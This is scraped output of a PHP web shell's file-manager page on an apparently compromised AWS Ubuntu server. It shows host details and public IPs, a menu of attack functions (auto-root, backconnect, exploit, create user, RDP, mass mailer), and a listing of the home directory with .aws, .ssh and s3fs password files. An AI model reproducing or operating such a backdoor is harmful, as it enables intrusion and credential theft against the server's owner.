Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.225.117.89
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
ubuntu /
[ HOME SHELL ]
Name
Size
Permission
Action
.aws
[ DIR ]
drwxrwxr-x
.cache
[ DIR ]
drwx------
.composer
[ DIR ]
drwxr-xr-x
.config
[ DIR ]
drwx------
.gnupg
[ DIR ]
drwx------
.local
[ DIR ]
drwxrwxr-x
.npm
[ DIR ]
drwxrwxr-x
.ssh
[ DIR ]
drwx------
ImageMagick-7.0.10-22
[ DIR ]
drwxrwxr-x
bkp
[ DIR ]
drwxrwxrwx
certificates
[ DIR ]
drwxrwxr-x
s3fs-fuse
[ DIR ]
drwxrwxr-x
.bash_history
37.21
KB
-rw-------
.bash_logout
220
B
-rw-r--r--
.bashrc
3.68
KB
-rw-r--r--
.gitconfig
178
B
-rw-rw-r--
.passwd-s3fs
62
B
-rw-------
.profile
807
B
-rw-r--r--
.selected_editor
66
B
-rw-rw-r--
.sudo_as_admin_successful
0
B
-rw-r--r--
.viminfo
13.52
KB
-rw-------
ImageMagick.tar.gz
13.39
MB
-rw-rw-r--
db_bkp_test.sh
2.5
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .profile
# ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi
Close